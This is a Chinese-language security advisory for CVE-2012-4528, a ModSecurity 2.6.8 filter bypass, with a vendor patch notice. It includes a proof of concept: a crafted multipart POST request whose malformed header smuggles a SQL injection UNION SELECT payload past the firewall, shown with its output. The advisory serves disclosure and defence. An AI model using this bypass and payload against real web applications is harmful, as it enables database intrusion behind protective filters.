ModSecurity POST参数安全绕过漏洞
发布日期:2012-10-17
更新日期:2012-10-22
受影响系统:modsecurity modsecurity 2.6.8
modsecurity modsecurity
描述:
BUGTRAQ ID:
56096
CVE ID:
CVE-2012-4528
ModSecurity是开源的Web应用防火墙。
ModSecurity 2.6.8及其他版本存在漏洞,成功利用后可允许攻击者绕过过滤规则。
<*来源:Bernhard Mueller (
research@sec-consult.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of concept:
-----------------
wut.php:
--------
<? echo $POST[xxx] ?>
POST request:
-------------
POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161
--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
--A--
Output:
-------
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
(any change in the header should produce a 403)d
建议:
厂商补丁:
modsecurity
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.modsecurity.org/浏览次数:2752
严重程度:0(网友投票)
